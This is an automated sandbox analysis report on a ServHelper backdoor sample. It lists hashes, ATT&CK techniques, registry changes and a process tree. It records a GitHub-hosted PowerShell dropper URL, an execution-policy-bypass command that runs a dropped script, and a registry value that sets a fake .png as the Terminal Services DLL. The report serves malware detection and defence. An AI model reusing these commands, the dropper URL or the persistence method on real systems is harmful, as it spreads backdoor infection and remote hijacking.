servhelper | 1d35504c81463a2597916e4ea5448d45caee98ccc8557e256bcc05a567584b37

Analysis

max time kernel
105s
max time network
107s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
29-08-2024 08:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

40d10714cfb75e2f22c44fd44e85d1d0N.exe
Size

7.1MB
MD5

40d10714cfb75e2f22c44fd44e85d1d0
SHA1

79e291688ecb088468e0162b0685956be1206fbd
SHA256

1d35504c81463a2597916e4ea5448d45caee98ccc8557e256bcc05a567584b37
SHA512

98095c75bc12cc6a0f353f7d40155a44222dab25569ee736ab232f7c985ebfbf4ffb9fab80dd27e2c581729f571029ed6eaea61d5bac32ac1ac3566e7faf2e4b
SSDEEP

196608:ZJM3nfEyJ8X2RmnK0v0Ahh0yfcjkbMebHjgTF8R:Z2f6X2RFWhSyQe3sFS

Score

10^/10

servhelper backdoor defense_evasion discovery execution exploit lateral_movement persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 6 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
lateral_movement

RDP Hijacking
T1563.002

Processes:

net1.execmd.exenet.exenet1.execmd.exenet.exe

pid process

3116 net1.exe
2612 cmd.exe
4560 net.exe
1192 net1.exe
3872 cmd.exe
3920 net.exe

pid	process
3116	net1.exe
2612	cmd.exe
4560	net.exe
1192	net1.exe
3872	cmd.exe
3920	net.exe

Blocklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow	pid	process
43	1976	powershell.exe
45	1976	powershell.exe
47	1976	powershell.exe
51	1976	powershell.exe
53	1976	powershell.exe
55	1976	powershell.exe
57	1976	powershell.exe

Indicator Removal: Network Share Connection Removal 1 TTPs 3 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
defense_evasion

Network Share Connection Removal
T1070.005

Processes:

cmd.exenet.exenet1.exe

pid process

3080 cmd.exe
5000 net.exe
4196 net1.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

5100 icacls.exe
4460 takeown.exe
4700 icacls.exe
4344 icacls.exe
1708 icacls.exe
1656 icacls.exe
3384 icacls.exe
1976 icacls.exe

pid	process
3080	cmd.exe
5000	net.exe
4196	net1.exe

pid	process
5100	icacls.exe
4460	takeown.exe
4700	icacls.exe
4344	icacls.exe
1708	icacls.exe
1656	icacls.exe
3384	icacls.exe
1976	icacls.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

40d10714cfb75e2f22c44fd44e85d1d0N.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	40d10714cfb75e2f22c44fd44e85d1d0N.exe

Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

4444 powershell.exe
Executes dropped EXE 3 IoCs

Processes:

Ridere.exe.comRidere.exe.comRidere.exe.com

pid process

1192 Ridere.exe.com
3720 Ridere.exe.com
892 Ridere.exe.com
Loads dropped DLL 2 IoCs

Processes:

pid process

1460
1460
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exe

pid process

4344 icacls.exe
1708 icacls.exe
1656 icacls.exe
3384 icacls.exe
1976 icacls.exe
5100 icacls.exe
4460 takeown.exe
4700 icacls.exe

pid	process
1192	Ridere.exe.com
3720	Ridere.exe.com
892	Ridere.exe.com

pid	process
1460
1460

pid	process
4344	icacls.exe
1708	icacls.exe
1656	icacls.exe
3384	icacls.exe
1976	icacls.exe
5100	icacls.exe
4460	takeown.exe
4700	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\Branding\mediasrv.png	upx
C:\Windows\Branding\mediasvc.png	upx

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

42 raw.githubusercontent.com
43 raw.githubusercontent.com
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

Ridere.exe.com

description pid process target process

PID 3720 set thread context of 892 3720 Ridere.exe.com Ridere.exe.com

flow	ioc
42	raw.githubusercontent.com
43	raw.githubusercontent.com

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

description	pid	process	target process
PID 3720 set thread context of 892	3720	Ridere.exe.com	Ridere.exe.com

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 18 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_vnzbxnbt.bbv.ps1	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_hviked14.xab.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI67DD.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI680F.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI67FE.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI681F.tmp	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI67ED.tmp	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

1772 powershell.exe
540 powershell.exe
2064 powershell.exe
1976 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

pid	process
1772	powershell.exe
540	powershell.exe
2064	powershell.exe
1976	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

40d10714cfb75e2f22c44fd44e85d1d0N.execmd.execmd.exefindstr.exePING.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	40d10714cfb75e2f22c44fd44e85d1d0N.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

PING.EXE

pid process

2460 PING.EXE
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

5028 WMIC.exe

pid	process
2460	PING.EXE

pid	process
5028	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 708ddc0a12e5da01	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3428 reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2460 PING.EXE

pid	process
3428	reg.exe

pid	process
2460	PING.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	45	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	47	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4444	powershell.exe
4444	powershell.exe
1772	powershell.exe
1772	powershell.exe
540	powershell.exe
540	powershell.exe
2064	powershell.exe
2064	powershell.exe
4444	powershell.exe
4444	powershell.exe
4444	powershell.exe
1976	powershell.exe
1976	powershell.exe
1976	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

656
656

pid	process
656
656

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4444	powershell.exe
Token: SeDebugPrivilege	1772	powershell.exe
Token: SeDebugPrivilege	540	powershell.exe
Token: SeDebugPrivilege	2064	powershell.exe
Token: SeRestorePrivilege	4344	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	5028	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5028	WMIC.exe
Token: SeAuditPrivilege	5028	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	5028	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5028	WMIC.exe
Token: SeAuditPrivilege	5028	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	3332	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3332	WMIC.exe
Token: SeAuditPrivilege	3332	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	3332	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3332	WMIC.exe
Token: SeAuditPrivilege	3332	WMIC.exe
Token: SeDebugPrivilege	1976	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

40d10714cfb75e2f22c44fd44e85d1d0N.execmd.execmd.exeRidere.exe.comRidere.exe.comRidere.exe.compowershell.execsc.exenet.execmd.execmd.exe

description	pid	process	target process
PID 3428 wrote to memory of 3776	3428	40d10714cfb75e2f22c44fd44e85d1d0N.exe	cmd.exe
PID 3428 wrote to memory of 3776	3428	40d10714cfb75e2f22c44fd44e85d1d0N.exe	cmd.exe
PID 3428 wrote to memory of 3776	3428	40d10714cfb75e2f22c44fd44e85d1d0N.exe	cmd.exe
PID 3776 wrote to memory of 1176	3776	cmd.exe	cmd.exe
PID 3776 wrote to memory of 1176	3776	cmd.exe	cmd.exe
PID 3776 wrote to memory of 1176	3776	cmd.exe	cmd.exe
PID 1176 wrote to memory of 4552	1176	cmd.exe	findstr.exe
PID 1176 wrote to memory of 4552	1176	cmd.exe	findstr.exe
PID 1176 wrote to memory of 4552	1176	cmd.exe	findstr.exe
PID 1176 wrote to memory of 1192	1176	cmd.exe	Ridere.exe.com
PID 1176 wrote to memory of 1192	1176	cmd.exe	Ridere.exe.com
PID 1176 wrote to memory of 2460	1176	cmd.exe	PING.EXE
PID 1176 wrote to memory of 2460	1176	cmd.exe	PING.EXE
PID 1176 wrote to memory of 2460	1176	cmd.exe	PING.EXE
PID 1192 wrote to memory of 3720	1192	Ridere.exe.com	Ridere.exe.com
PID 1192 wrote to memory of 3720	1192	Ridere.exe.com	Ridere.exe.com
PID 3720 wrote to memory of 892	3720	Ridere.exe.com	Ridere.exe.com
PID 3720 wrote to memory of 892	3720	Ridere.exe.com	Ridere.exe.com
PID 3720 wrote to memory of 892	3720	Ridere.exe.com	Ridere.exe.com
PID 3720 wrote to memory of 892	3720	Ridere.exe.com	Ridere.exe.com
PID 892 wrote to memory of 4444	892	Ridere.exe.com	powershell.exe
PID 892 wrote to memory of 4444	892	Ridere.exe.com	powershell.exe
PID 4444 wrote to memory of 2944	4444	powershell.exe	csc.exe
PID 4444 wrote to memory of 2944	4444	powershell.exe	csc.exe
PID 2944 wrote to memory of 3708	2944	csc.exe	cvtres.exe
PID 2944 wrote to memory of 3708	2944	csc.exe	cvtres.exe
PID 4444 wrote to memory of 1772	4444	powershell.exe	powershell.exe
PID 4444 wrote to memory of 1772	4444	powershell.exe	powershell.exe
PID 4444 wrote to memory of 540	4444	powershell.exe	powershell.exe
PID 4444 wrote to memory of 540	4444	powershell.exe	powershell.exe
PID 4444 wrote to memory of 2064	4444	powershell.exe	powershell.exe
PID 4444 wrote to memory of 2064	4444	powershell.exe	powershell.exe
PID 4444 wrote to memory of 4460	4444	powershell.exe	takeown.exe
PID 4444 wrote to memory of 4460	4444	powershell.exe	takeown.exe
PID 4444 wrote to memory of 4700	4444	powershell.exe	icacls.exe
PID 4444 wrote to memory of 4700	4444	powershell.exe	icacls.exe
PID 4444 wrote to memory of 4344	4444	powershell.exe	icacls.exe
PID 4444 wrote to memory of 4344	4444	powershell.exe	icacls.exe
PID 4444 wrote to memory of 1708	4444	powershell.exe	icacls.exe
PID 4444 wrote to memory of 1708	4444	powershell.exe	icacls.exe
PID 4444 wrote to memory of 1656	4444	powershell.exe	icacls.exe
PID 4444 wrote to memory of 1656	4444	powershell.exe	icacls.exe
PID 4444 wrote to memory of 3384	4444	powershell.exe	icacls.exe
PID 4444 wrote to memory of 3384	4444	powershell.exe	icacls.exe
PID 4444 wrote to memory of 1976	4444	powershell.exe	icacls.exe
PID 4444 wrote to memory of 1976	4444	powershell.exe	icacls.exe
PID 4444 wrote to memory of 5100	4444	powershell.exe	icacls.exe
PID 4444 wrote to memory of 5100	4444	powershell.exe	icacls.exe
PID 4444 wrote to memory of 2540	4444	powershell.exe	reg.exe
PID 4444 wrote to memory of 2540	4444	powershell.exe	reg.exe
PID 4444 wrote to memory of 3428	4444	powershell.exe	reg.exe
PID 4444 wrote to memory of 3428	4444	powershell.exe	reg.exe
PID 4444 wrote to memory of 960	4444	powershell.exe	reg.exe
PID 4444 wrote to memory of 960	4444	powershell.exe	reg.exe
PID 4444 wrote to memory of 2388	4444	powershell.exe	net.exe
PID 4444 wrote to memory of 2388	4444	powershell.exe	net.exe
PID 2388 wrote to memory of 456	2388	net.exe	net1.exe
PID 2388 wrote to memory of 456	2388	net.exe	net1.exe
PID 4444 wrote to memory of 4556	4444	powershell.exe	cmd.exe
PID 4444 wrote to memory of 4556	4444	powershell.exe	cmd.exe
PID 4556 wrote to memory of 4132	4556	cmd.exe	cmd.exe
PID 4556 wrote to memory of 4132	4556	cmd.exe	cmd.exe
PID 4132 wrote to memory of 4304	4132	cmd.exe	net.exe
PID 4132 wrote to memory of 4304	4132	cmd.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\40d10714cfb75e2f22c44fd44e85d1d0N.exe
"C:\Users\Admin\AppData\Local\Temp\40d10714cfb75e2f22c44fd44e85d1d0N.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3428
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cmd < Rimanete.tif
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3776
- - C:\Windows\SysWOW64\cmd.exe
    cmd
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1176
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^VTfYuQOpFJudcGruzcImzLEAazBBhsyZnLoMSzOJIRuLfpTwSWYiqJalgOGNgjVhDuSKndhqGYRBETkoAmJdzXZOzYntMwxcVTiosoCCIXAeRQFxDnjPDFUGirsASpgFDc$" Vedevo.tif
      4⤵
      System Location Discovery: System Language Discovery
      PID:4552
  - - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Ridere.exe.com
      Ridere.exe.com v
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1192
    - - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Ridere.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Ridere.exe.com v
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:3720
      - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Ridere.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Ridere.exe.com
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
        7⤵
        Deletes itself
        Drops file in System32 directory
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
